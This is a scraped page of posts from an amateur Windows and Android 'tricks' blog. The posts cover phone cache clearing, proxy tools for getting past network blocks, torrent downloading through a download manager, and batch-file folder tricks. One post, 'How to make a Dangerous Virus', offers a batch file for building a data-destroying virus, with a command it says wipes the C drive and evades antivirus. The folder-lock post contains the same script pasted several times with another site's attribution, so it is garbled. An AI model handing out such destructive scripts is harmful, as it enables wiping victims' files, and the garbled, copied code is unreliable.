Showing posts with label TRICKS. Show all posts
Showing posts with label TRICKS. Show all posts

Monday, 27 April 2015

Increase Moto G Speed By Clear Cache Partition

After android L update of moto G users reported many bugs which made moto g very slow. Many methods are available on internet to speed up after android L update. One of them is to Clear Cache Partition of moto g.

What is Cache Partition


It is the space allocated in your mobile for storing temporary files such as temporary files after update or of Google Play Store etc.

How To Clear Cache Partition


  • Power of the Phone

  • When the phone is turned off press POWER KEY+VOL DOWN KEY at the same time for 10 to 12 seconds.

Wipe Cache Partition
Boot Menu
  • You should be in boot option menu . Now navigate to RECOVERY option using VOL DOWN key and then select RECOVERY option using VOL UP KEY.

  • The device will display Motorola logo with android as dead and a exclamation mark

  • Press and hold POWER KEY for 3 to 4 sec and then press VOL UP KEY and release.

  • In the additional menu option navigate to WIPE CACHE PARTITION using VOL DOWN KEY and select WIPE CACHE PARTITION using POWER KEY.

Wipe cache Prtition Moto g android l
  • Wait for the process to complete when its shows formatting completed. This may take long time.

  • Power up phone from the menu or by long pressing POWER KEY.

Wiping Cache Partition free up more space in moto G and have no impact on other files and apps of your phone. So its safe and Good. Deleting temporary files may boost up your moto g android l.
Enjoy with Freedom.

Saturday, 24 May 2014

How to access Blocked websites using KPROXY

This is most simple easier and convinient method to access blocked sites over internet. KProxy.com is helping hundreds of thousands of people daily protecting their privacy and identity online and giving access to censored sites since many years. It is the most reliable and fastest free anonymous web proxy in internet.


HOW IT WORKS!


It is based on online proxy. It hides Your IP address and bypass the server to access blocked sites on your nework.


HOW TO USE!



  • Go to its website by clicking the following link and download it. I personally recommend you to download portable version of this software.


     FOR NON-PORTABLE VERSION

                                  CLICK TO DOWNLOAD KPROXY

      FOR PORTABLE VERSION

                                   CLICK TO DOWNLOAD KPROXY


  • Unzip the files using WINZIP or windows extractor by RIGHT CLICK on it and the the option EXTRACT HERE.


  • Open the files once extracted. click on SURF application in the folder.


  • Kproxy window will appear along with a portable Google Chrome. You can configure proxy configuration if you use proxy to access the internet else not required.


  • Its done! Surf with FREEDOM.




     

How To Use Proxifier To Bypass Blocked Websites

This is one of the best software to access blocked sites weather on LAN or over Wi-Fi network or in any zone. You can access FACEBOOK or YOUTUBE or any other websites blocked by your administrator.


How It Works


This Make another programs such as Mozilla Firefox, Google Chrome etc to pass through a proxy server by intercepting and modifying there network request. Hence it allows all program to bypass the server installed on your computer to access the Internet.


How to Use IT!

    

 Part-1

  • Download Proxifier setup from its website.You prefer any of the following links or do some google.
       Direct Link:

                                1.CLICK TO DOWNLOAD PROXIFIER

      CNET Secure Download:

                                 2.CLICK TO DOWNLOAD PROXIFIER




  • Install the proxifier setup on your computer. And then open it.

Part- 2

  • Find out your  IP address of the network. To do this open google.com and type " MY IP ADDRESS"  and hit Enter. Note down the address displayed on the google.

  • Next you have to find ports present on this ip address. For This simply click the following link enter your IP address and hit Enter.

          
                                                    Click To Find Ports




  • There are many other software for finding ports if this does not work then you can try softwares.
  • Find the port named with the name "ndl-aas". Note down its Port Number.

 Part- 3

      
  • Open Proxifier.
  • Click On Create new 
  • Click on "ADD NEW".
  • Check HTTPS tab.
  • Enter the IP address you have searched and the Port Number you have noted down. Click OK.
  • Minimize the Proxifier.
  • Open Mozilla or chrome and feel the FREEDOM.


                        
    

Saturday, 12 April 2014

DOWNLOAD TORRENT BY IDM(INTERNET DOWNLOAD MANAGER)

DOWNLOAD TORRENTS AT HIGH SPEED!!


Torrent websites are the currently largest file hosting and sharing place. Every thing weather it is free or have some cost is available freely via torrents and of course which is free off cost.


Torrents generally need some software to download these files. But there is a process by which it can be easily downloaded by Internet download Manager which will increase the downloading speed by 400 times. Just follow these steps: 

  • Go to any torrent website and search for the file/music/video etc you want.


  • Just copy the torrent magnetic link of that file
  • Now open ZBIGZ.COM in new tab.


  • Paste the magnetic torrent link in the space provided.
  • Wait till it is uploaded once uploaded click on download


Your file will be captured by internet download manager.For any query comment below..


Saturday, 12 October 2013

How to make a Dangerous Virus

Your are a minute before to create the dangerous virus you must have ever seen!!!


This Virus is bieng created by using batch file programming. 

This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. 



How to Make the virus ?

  • Open Notepad and copy below code into it.

   
@Echo off
    Del C:\ *.* |y


  • Save this file as virus.bat (Name can be anything but .bat is must)
  • Now, running this file will delete all the content of C Drive.


Warning: Try at your own risk



Yoy may be intrested in

                    Create Virus To Disable Mouse
                                          
                            

Password Protect Any Folder

Again Some time you have some sensible and much important files to protect and to keep safely it on your PC.

Here is the intresting trick how to lock the folder with a password without any software.



Steps to Create Folder Lock


  • Open Notepad and Copy code given below into it.



    cls
    @ECHO OFF
    title avkfreedom.blogspot.com
    if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
    if NOT EXIST MyFolder goto MDMyFolder
    :CONFIRM
    echo Are you sure to lock this folder? (Y/N)
    set/p "cho=>"
    if %cho%==Y goto LOCK
    if %cho%==y goto LOCK
    if %cho%==n goto END
    if %cho%==N goto END
    echo Invalid choice.
    goto CONFIRM
    :LOCK
    ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    echo Folder locked
    goto End
    :UNLOCK
    echo Enter password to Unlock Your Secure Folder
    set/p "pass=>"
    if NOT %pass%== avkfreedom goto FAIL
    attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
    echo Folder Unlocked successfully
    goto End
    :FAIL
    echo Invalid password
    goto end
    :MDMyFolder
    md MyFolder
    echo MyFolder created successfully
    goto End
    :End

cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End - See more at: http://www.coolhackingtrick.com/2013/04/password-protect-any-folder-without-any.html#sthash.nvTzvfGX.dpuf
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End - See more at: http://www.coolhackingtrick.com/2013/04/password-protect-any-folder-without-any.html#sthash.nvTzvfGX.dpuf
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End - See more at: http://www.coolhackingtrick.com/2013/04/password-protect-any-folder-without-any.html#sthash.nvTzvfGX.dpuf

  • Save the notepad file as lock.bat (.bat is must)
  • Now double click on lock.bat and a new folder will be created with name MyFolder
  • Copy all your data you want to protect in that New folder
  • Now double click on lock.bat and when command promp appears Type Y and press enter.
  • Now MyFolder will be hidden from you view, to access that folder double click on lock.bat 
  • It will ask for password enter your password and done. (Default password is avkfreedom


NOTE-Here the Default Password Is"avkfreedom"

 For Further Security- Copy Your LOCK.BAT file in some secure place or in pendrive.

Feel free to comment below..

 

Monday, 7 October 2013

Create Non-Deletable And Non-Renameable Folder

Some time you have some sensible and much important files to protect and to keep safely it on your PC.

Here is a trick to create a folder which neither can be deleted nor can be renamed.


Trick is that you have to make the folder with name which are reserved words in windows. You have to use only these names to create the folder. These names are-    


[ con, aux, lpt1, lpt2, lpt3 to lpt9 ]



Steps To Create Non-deleteable And Non-renameable Folder




  • Go to start and click on RUN.
  • Type "cmd" and hit ENTER.
  • In the cmd window type C: or D: and hit enter.(You can't create this type folder in the drive where windows is installed generally C:)
  • Type md con\ and hit enter (md - make directory)
  • You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.
  • Open that directory, you will see the folder created of name con.
  • Try to delete that folder or rename that folder windows will show the error message. 


How to delete such files

It is not possible to delete that folder manually but you can delete this folder by another way mentioned below.


  • Open Command Prompt
  • Type D: ( if u created this type of folder in D: drive) & hit enter
  • Type rd con\ (rd - remove directory)
  • Open that directory and the folder will not appear because it is removed.

Friday, 27 September 2013

Whats App on PC

!!!!AMAZED!!!!!

 

But its true you can have Whats App on you computer and laptop.

With Bluestack all android apps runs on windows or Linux operating system in the same way as they run on your phone.

Follow the following steps:  

  • BLUESTACK provide interference between all android apps and your computer.

    CLICK TO DOWNLOAD BLUESTACK

 

  • Choose the correct operating system download and install bluestack on your computer.

  •  Now install whats app directly via bluestack search manager or install by APK while of whats apk.

  CLICK HERE IF YOU DO NOT KNOW HOW TO MAKE APK OF WHATS APP 

 

  • After installing the whats app open it on bluestack and enjoy chatting with your friends.

    Feel free to comment below!

 

Transfer Android Apps Between Phones Over Bluetooth(APK)

Its the era of ANDROID and the only place where you can get all of your android apps is Google play.

 

So why to install same app angain angain from google play?????

 

You can backup all your app installed on your phone as a APK file and use this APK file to install the same in future. Even you can transfer installed app on your mobile to other phone by Bluetooth


Astro is a leading file explorer for Android, and I am sure most of you have come across it. Undoubtedly, it is one of the best Android file explorers one can use, but there’s a lot more to it than that. One of the features of Astro is that it lets you backup your installed apps on the memory card as an APK file so that you can restore them at the time of crisis. What we will do is, we will see how we can create an APK of an individual file and send it over Bluetooth to another device using this tool.

Steps to Send App APKs Over Bluetooth

  • After you have downloaded and installed Astro on your Android, run the application, press the settings soft key and select tools to open a pop-up window.

Astro  (2)


  • Select Application Backup from the popup tool window and wait for Astro to make a list of all the applications installed on your Android. In the list select the application you want to send over Bluetooth and click the backup button to create the APK file. You can select multiple applications as well. Once the backup is complete, press the back soft key to return to the Astro Home.


  • On the home screen, you will see all the files and folders in your mounted SD card. Navigate to the folder Backups—>Apps to find the APK files you have created above.

Astro  (1)
  • Well, our journey with Astro completes here. We will now use Bluetooth File Transfer app for Android to transfer these files over Bluetooth as APK access to Bluetooth are locked by default on most of the devices. Once you have downloaded and installed Bluetooth File Transfer app on your Android, launch the application.

  • In Bluetooth File Transfer application, navigate to the same folder Backups—>Apps and select the file you want to send. After selecting press the Bluetooth button, search for the device and send the file. Once the receiver receives the file, he will be able to install it.

Bluetooth FIle Transfer  (2)
  • Select the app which you want to send.
    • Above are the simple way to transfer via bluetooth..










     If you face any problem comment below.

    Airport Authority of India AAI JE Previous Year paper

    I have tried to collect previous year paper of Airport Authority of India. AAI JE ATC PREVIOUS YEAR PAPER                            ...